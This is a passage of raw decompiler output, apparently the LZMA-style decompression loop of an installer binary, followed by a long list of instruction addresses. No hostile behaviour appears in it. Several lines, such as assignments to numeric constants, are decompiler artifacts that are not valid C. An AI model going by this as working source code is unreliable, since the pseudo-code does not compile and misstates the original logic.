												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                    0x00000000
                    0x00406409
                    0x00406409
                    0x0040640d
                    0x0040641a
                    0x00406424
                    0x00000000
                    0x0040640f
                    0x0040640f
                    0x0040644a
                    0x0040644d
                    0x00406450
                    0x00406453
                    0x00406453
                    0x00406456
                    0x0040645d
                    0x00406462
                    0x00406343
                    0x00406346
                    0x004066b8
                    0x004066b8
                    0x004066b8
                    0x004066bb
                    0x004066bb
                    0x004066bb
                    0x004066c1
                    0x004066c7
                    0x004066cd
                    0x004066e7
                    0x004066ea
                    0x004066f0
                    0x004066fb
                    0x004066fd
                    0x004066cf
                    0x004066cf
                    0x004066de
                    0x004066e2
                    0x004066e2
                    0x00406707
                    0x00000000
                    0x00000000
                    0x00406709
                    0x0040670d
                    0x004068bc
                    0x004068d2
                    0x004068da
                    0x004068e1
                    0x004068e3
                    0x004068ea
                    0x004068ee
                    0x004068ee
                    0x00406719
                    0x00406720
                    0x00406728
                    0x0040672b
                    0x0040672e
                    0x0040672e
                    0x00406734
                    0x00406734
                    0x00405ed0
                    0x00405ed0
                    0x00405ed0
                    0x00405ed9
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x00000000
                    0x00405eea
                    0x00000000
                    0x00000000
                    0x00405ef3
                    0x00405ef6
                    0x00405ef9
                    0x00405efd
                    0x00000000
                    0x00000000
                    0x00405f03
                    0x00405f06
                    0x00405f08
                    0x00405f09
                    0x00405f0c
                    0x00405f0e
                    0x00405f0f
                    0x00405f11
                    0x00405f14
                    0x00405f19
                    0x00405f1e
                    0x00405f27
                    0x00405f3a
                    0x00405f3d
                    0x00405f49
                    0x00405f71
                    0x00405f73
                    0x00405f81
                    0x00405f81
                    0x00405f85
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405f75
                    0x00405f75
                    0x00405f78
                    0x00405f79
                    0x00405f79
                    0x00000000
                    0x00405f75
                    0x00405f4f
                    0x00405f54
                    0x00405f54
                    0x00405f5d
                    0x00405f65
                    0x00405f68
                    0x00000000
                    0x00405f6e
                    0x00405f6e
                    0x00000000
                    0x00405f6e
                    0x00000000
                    0x00405f8b
                    0x00405f8b
                    0x00405f8f
                    0x0040683b
                    0x00000000
                    0x0040683b
                    0x00405f98
                    0x00405fa8
                    0x00405fab
                    0x00405fae
                    0x00405fae
                    0x00405fae
                    0x00405fb1
                    0x00405fb5
                    0x00000000
                    0x00000000
                    0x00405fb7
                    0x00405fbd
                    0x00405fe7
                    0x00405fed
                    0x00405ff4
                    0x00000000
                    0x00405ff4
                    0x00405fc3
                    0x00405fc6
                    0x00405fcb
                    0x00405fcb
                    0x00405fd6
                    0x00405fde
                    0x00405fe1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406026
                    0x0040602c
                    0x0040602f
                    0x0040603c
                    0x00406044
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x00000000
                    0x00405ffb
                    0x00405ffb
                    0x00405fff
                    0x0040684a
                    0x00000000
                    0x0040684a
                    0x0040600b
                    0x00406016
                    0x00406016
                    0x00406016
                    0x00406019
                    0x0040601c
                    0x0040601f
                    0x00406024
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066bb
                    0x004066bb
                    0x004066c1
                    0x004066c7
                    0x004066cd
                    0x004066e7
                    0x004066ea
                    0x004066f0
                    0x004066fb
                    0x004066fd
                    0x004066cf
                    0x004066cf
                    0x004066de
                    0x004066e2
                    0x004066e2
                    0x00406707
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040604c
                    0x0040604e
                    0x00406051
                    0x004060c2
                    0x004060c5
                    0x004060c8
                    0x004060cf
                    0x004060d9
                    0x004066b8
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x004066b8
                    0x00406053
                    0x00406057
                    0x0040605a
                    0x0040605c
                    0x0040605f
                    0x00406062
                    0x00406064
                    0x00406067
                    0x00406069
                    0x0040606e
                    0x00406071
                    0x00406074
                    0x00406078
                    0x0040607f
                    0x00406082
                    0x00406089
                    0x0040608d
                    0x00406095
                    0x00406095
                    0x00406095
                    0x0040608f
                    0x0040608f
                    0x0040608f
                    0x00406084
                    0x00406084
                    0x00406084
                    0x00406099
                    0x0040609c
                    0x004060ba
                    0x004060bc
                    0x00000000
                    0x0040609e
                    0x0040609e
                    0x004060a1
                    0x004060a4
                    0x004060a7
                    0x004060a9
                    0x004060a9
                    0x004060a9
                    0x004060ac
                    0x004060af
                    0x004060b1
                    0x004060b2
                    0x004060b5
                    0x00000000
                    0x004060b5
                    0x00000000
                    0x004062eb
                    0x004062ef
                    0x0040630d
                    0x00406310
                    0x00406317
                    0x0040631a
                    0x0040631d
                    0x00406320
                    0x00406323
                    0x00406326
                    0x00406328
                    0x0040632f
                    0x00406330
                    0x00406332
                    0x00406335
                    0x00406338
                    0x0040633b
                    0x0040633b
                    0x00406340
                    0x00000000
                    0x00406340
                    0x004062f1
                    0x004062f4
                    0x004062f7
                    0x00406301
                    0x004066b8
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x00000000
                    0x00406355
                    0x00406359
                    0x0040637c
                    0x0040637f
                    0x00406382
                    0x0040638c
                    0x0040635b
                    0x0040635b
                    0x0040635e
                    0x00406361
                    0x00406364
                    0x00406371
                    0x00406374
                    0x00406374
                    0x004066b8
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x00000000
                    0x00406398
                    0x0040639c
                    0x00000000
                    0x00000000
                    0x004063a2
                    0x004063a6
                    0x00000000
                    0x00000000
                    0x004063ac
                    0x004063ae
                    0x004063b2
                    0x004063b2
                    0x004063b5
                    0x004063b9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406430
                    0x00406434
                    0x0040643b
                    0x0040643e
                    0x00406441
                    0x00406436
                    0x00406436
                    0x00406436
                    0x00406444
                    0x00406447
                    0x00000000
                    0x00000000
                    0x004064f0
                    0x004064f0
                    0x004064f4
                    0x00406892
                    0x00000000
                    0x00406892
                    0x004064fa
                    0x004064fd
                    0x00406500
                    0x00406504
                    0x00406507
                    0x0040650d
                    0x0040650f
                    0x0040650f
                    0x0040650f
                    0x00406512
                    0x00406515
                    0x00000000
                    0x00000000
                    0x004060e5
                    0x004060e5
                    0x004060e9
                    0x00406856
                    0x00000000
                    0x00406856
                    0x004060ef
                    0x004060f2
                    0x004060f5
                    0x004060f9
                    0x004060fc
                    0x00406102
                    0x00406104
                    0x00406104
                    0x00406104
                    0x00406107
                    0x0040610a
                    0x0040610a
                    0x0040610d
                    0x00406110
                    0x00000000
                    0x00000000
                    0x00406116
                    0x0040611c
                    0x00000000
                    0x00000000
                    0x00406122
                    0x00406122
                    0x00406126
                    0x00406129
                    0x0040612c
                    0x0040612f
                    0x00406132
                    0x00406133
                    0x00406136
                    0x00406138
                    0x0040613e
                    0x00406141
                    0x00406144
                    0x00406147
                    0x0040614a
                    0x0040614d
                    0x00406150
                    0x0040616c
                    0x0040616f
                    0x00406172
                    0x00406175
                    0x0040617c
                    0x00406180
                    0x00406182
                    0x00406186
                    0x00406152
                    0x00406152
                    0x00406156
                    0x0040615e
                    0x00406163
                    0x00406165
                    0x00406167
                    0x00406167
                    0x00406189
                    0x00406190
                    0x00406193
                    0x00000000
                    0x00406199
                    0x00000000
                    0x00406199
                    0x00000000
                    0x0040619e
                    0x0040619e
                    0x004061a2
                    0x00406862
                    0x00000000
                    0x00406862
                    0x004061a8
                    0x004061ab
                    0x004061ae
                    0x004061b2
                    0x004061b5
                    0x004061bb
                    0x004061bd
                    0x004061bd
                    0x004061bd
                    0x004061c0
                    0x004061c3
                    0x004061c3
                    0x004061c3
                    0x004061c9
                    0x00000000
                    0x00000000
                    0x004061cb
                    0x004061ce
                    0x004061d1
                    0x004061d4
                    0x004061d7
                    0x004061da
                    0x004061dd
                    0x004061e0
                    0x004061e3
                    0x004061e6
                    0x004061e9
                    0x00406201
                    0x00406204
                    0x00406207
                    0x0040620a
                    0x0040620a
                    0x0040620d
                    0x00406211
                    0x00406213
                    0x004061eb
                    0x004061eb
                    0x004061f3
                    0x004061f8
                    0x004061fa
                    0x004061fc
                    0x004061fc
                    0x00406216
                    0x0040621d
                    0x00406220
                    0x00000000
                    0x00406222
